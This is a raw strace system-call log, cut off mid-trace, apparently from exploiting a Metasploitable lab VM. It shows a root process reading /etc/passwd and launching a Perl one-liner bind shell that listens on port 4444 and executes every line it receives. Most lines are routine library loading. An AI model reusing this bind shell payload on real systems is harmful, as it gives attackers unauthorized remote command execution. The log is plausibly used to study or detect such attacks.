10349 07:32:35.181851 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10349 07:32:35.181941 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10349 07:32:35.181958 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6c000

10349 07:32:35.181969 mmap2(0xb7d75000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d75000

10349 07:32:35.181985 close(1)          = 0

10349 07:32:35.182006 munmap(0xb7f27000, 29913) = 0

10349 07:32:35.182022 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10349 07:32:35.182037 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10349 07:32:35.182049 _llseek(1, 0, [0], SEEK_CUR) = 0

10349 07:32:35.182061 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10349 07:32:35.182077 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f2e000

10349 07:32:35.182088 _llseek(1, 1624, [1624], SEEK_SET) = 0

10349 07:32:35.182103 munmap(0xb7f2e000, 1624) = 0

10349 07:32:35.182112 close(1)          = 0

10349 07:32:35.182153 getpgrp()         = 3831

10349 07:32:35.182185 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10349 07:32:35.182200 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10349 07:32:35.182231 brk(0x8101000)    = 0x8101000

10349 07:32:35.182263 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10349 07:32:35.182278 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10349 07:32:35.182292 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10349 07:32:35.182330 brk(0x8102000)    = 0x8102000

10349 07:32:35.182356 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10349 07:32:35.182375 stat64("/sbin/AB", 0xbfa890d8) = -1 ENOENT (No such file or directory)

10349 07:32:35.182388 stat64("/bin/AB", 0xbfa890d8) = -1 ENOENT (No such file or directory)

10349 07:32:35.182399 stat64("/usr/sbin/AB", 0xbfa890d8) = -1 ENOENT (No such file or directory)

10349 07:32:35.182411 stat64("/usr/bin/AB", 0xbfa890d8) = -1 ENOENT (No such file or directory)

10349 07:32:35.182428 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10349 07:32:35.182443 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da26f8) = 10350

10350 07:32:35.182488 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10350 07:32:35.182506 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10350 07:32:35.182519 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10350 07:32:35.182531 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10350 07:32:35.182546 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10350 07:32:35.182562 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10350 07:32:35.182575 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10350 07:32:35.182632 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10350 07:32:35.182689 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10350 07:32:35.182789 exit_group(127)   = ?

10349 07:32:35.213046 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10349 07:32:35.213046 --- SIGCHLD (Child exited) @ 0 (0) ---

10349 07:32:35.213046 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10350

10349 07:32:35.213046 waitpid(-1, 0xbfa88d58, WNOHANG) = -1 ECHILD (No child processes)

10349 07:32:35.213047 sigreturn()       = ? (mask now [])

10349 07:32:35.213049 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10349 07:32:35.213065 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10349 07:32:35.213076 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10349 07:32:35.213088 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10349 07:32:35.213107 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10349 07:32:35.213118 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10349 07:32:35.213153 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10349 07:32:35.213173 stat64("/sbin/perl", 0xbfa89108) = -1 ENOENT (No such file or directory)

10349 07:32:35.213185 stat64("/bin/perl", 0xbfa89108) = -1 ENOENT (No such file or directory)

10349 07:32:35.213196 stat64("/usr/sbin/perl", 0xbfa89108) = -1 ENOENT (No such file or directory)

10349 07:32:35.213207 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10349 07:32:35.213225 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10349 07:32:35.213250 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10349 07:32:35.213264 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da26f8) = 10351

10351 07:32:35.213356 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10351 07:32:35.213389 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10351 07:32:35.213416 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10351 07:32:35.213428 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10351 07:32:35.213443 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10351 07:32:35.213458 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10351 07:32:35.213471 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10351 07:32:35.213505 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10351 07:32:35.213595 brk(0)            = 0x8153000

10351 07:32:35.213616 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10351 07:32:35.213633 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7faa000

10351 07:32:35.213649 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10351 07:32:35.213666 open("/etc/ld.so.cache", O_RDONLY) = 1

10351 07:32:35.213678 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10351 07:32:35.213695 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fa2000

10351 07:32:35.213705 close(1)          = 0

10351 07:32:35.213716 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10351 07:32:35.213731 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10351 07:32:35.213751 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10351 07:32:35.213890 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10351 07:32:35.213923 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f9e000

10351 07:32:35.213936 mmap2(0xb7fa0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fa0000

10351 07:32:35.213952 close(1)          = 0

10351 07:32:35.213963 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10351 07:32:35.213977 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10351 07:32:35.213991 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10351 07:32:35.214077 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10351 07:32:35.214093 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f79000

10351 07:32:35.214104 mmap2(0xb7f9c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f9c000

10351 07:32:35.214119 close(1)          = 0

10351 07:32:35.214131 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10351 07:32:35.214144 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10351 07:32:35.214158 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10351 07:32:35.214246 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10351 07:32:35.214263 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f78000

10351 07:32:35.214275 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f60000

10351 07:32:35.214286 mmap2(0xb7f74000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f74000

10351 07:32:35.214336 mmap2(0xb7f76000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f76000

10351 07:32:35.214352 close(1)          = 0

10351 07:32:35.214377 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10351 07:32:35.214390 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10351 07:32:35.214403 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10351 07:32:35.214490 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10351 07:32:35.214507 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e11000

10351 07:32:35.214518 mmap2(0xb7f5a000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f5a000

10351 07:32:35.214532 mmap2(0xb7f5d000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f5d000

10351 07:32:35.214545 close(1)          = 0

10351 07:32:35.214557 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10351 07:32:35.214569 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10351 07:32:35.214583 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10351 07:32:35.214688 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10351 07:32:35.214705 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ddf000

10351 07:32:35.214717 mmap2(0xb7de8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7de8000

10351 07:32:35.214732 mmap2(0xb7dea000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dea000

10351 07:32:35.214745 close(1)          = 0

10351 07:32:35.214769 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dde000

10351 07:32:35.214782 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dde8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10351 07:32:35.214855 mprotect(0xb7f5a000, 4096, PROT_READ) = 0

10351 07:32:35.214883 munmap(0xb7fa2000, 29913) = 0

10351 07:32:35.214896 set_tid_address(0xb7dde908) = 10351

10351 07:32:35.214905 set_robust_list(0xb7dde910, 0xc) = 0

10351 07:32:35.214915 futex(0xbfb4a7e0, 0x81 /* FUTEX_??? */, 1) = 0

10351 07:32:35.214929 rt_sigaction(SIGRTMIN, {0xb7f642c0, [], SA_SIGINFO}, NULL, 8) = 0

10351 07:32:35.214942 rt_sigaction(SIGRT_1, {0xb7f64340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10351 07:32:35.214955 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10351 07:32:35.214968 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10351 07:32:35.214988 uname({sys="Linux", node="metasploitable", ...}) = 0

10351 07:32:35.215034 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10351 07:32:35.215080 brk(0)            = 0x8153000

10351 07:32:35.215090 brk(0x8174000)    = 0x8174000

10351 07:32:35.215134 getuid32()        = 0

10351 07:32:35.215143 geteuid32()       = 0

10351 07:32:35.215153 getgid32()        = 0

10351 07:32:35.215162 getegid32()       = 0

10351 07:32:35.215199 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dbd000

10351 07:32:35.215226 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10351 07:32:35.215243 read(1, "?5X\242", 4) = 4

10351 07:32:35.215256 close(1)          = 0

10351 07:32:35.215275 time(NULL)        = 1495625555

10351 07:32:35.215331 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfb4a4b0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215351 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfb4a4b0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215364 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfb4a4b0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215380 stat64("/usr/local/lib/perl/5.8.7", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215392 stat64("/usr/local/share/perl/5.8.7", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215404 stat64("/usr/local/lib/perl/5.8.6", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215416 stat64("/usr/local/share/perl/5.8.6", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215428 stat64("/usr/local/lib/perl/5.8.4", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215439 stat64("/usr/local/share/perl/5.8.4", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215451 stat64("/usr/local/lib/perl/5.8.3", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215462 stat64("/usr/local/share/perl/5.8.3", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215474 stat64("/usr/local/lib/perl/5.8.2", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215485 stat64("/usr/local/share/perl/5.8.2", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215497 stat64("/usr/local/lib/perl/5.8.1", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215509 stat64("/usr/local/share/perl/5.8.1", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215520 stat64("/usr/local/lib/perl/5.8.0", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215535 stat64("/usr/local/share/perl/5.8.0", 0xbfb4a5f0) = -1 ENOENT (No such file or directory)

10351 07:32:35.215558 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb4a2e8) = -1 ENOTTY (Inappropriate ioctl for device)

10351 07:32:35.215572 _llseek(0, 0, [0], SEEK_CUR) = 0

10351 07:32:35.215584 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb4a2e8) = -1 EBADF (Bad file descriptor)

10351 07:32:35.215595 _llseek(1, 0, 0xbfb4a330, SEEK_CUR) = -1 EBADF (Bad file descriptor)

10351 07:32:35.215605 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb4a2e8) = -1 EINVAL (Invalid argument)

10351 07:32:35.215616 _llseek(2, 0, 0xbfb4a330, SEEK_CUR) = -1 ESPIPE (Illegal seek)

10351 07:32:35.215626 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

10351 07:32:35.215639 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb4a3a8) = -1 ENOTTY (Inappropriate ioctl for device)

10351 07:32:35.215649 _llseek(1, 0, [0], SEEK_CUR) = 0

10351 07:32:35.215660 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

10351 07:32:35.215672 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

10351 07:32:35.215690 rt_sigaction(SIGCHLD, NULL,  <unfinished ...>

4519  07:32:35.215700 waitpid(10349,  <unfinished ...>

10351 07:32:35.215709 <... rt_sigaction resumed> {SIG_DFL}, 8) = 0

10351 07:32:35.215758 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

10351 07:32:35.215815 getppid()         = 10349

10351 07:32:35.215918 stat64("/etc/perl/IO.pmc", 0xbfb4a09c) = -1 ENOENT (No such file or directory)

10351 07:32:35.215932 stat64("/etc/perl/IO.pm", 0xbfb49fac) = -1 ENOENT (No such file or directory)

10351 07:32:35.215946 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfb4a09c) = -1 ENOENT (No such file or directory)

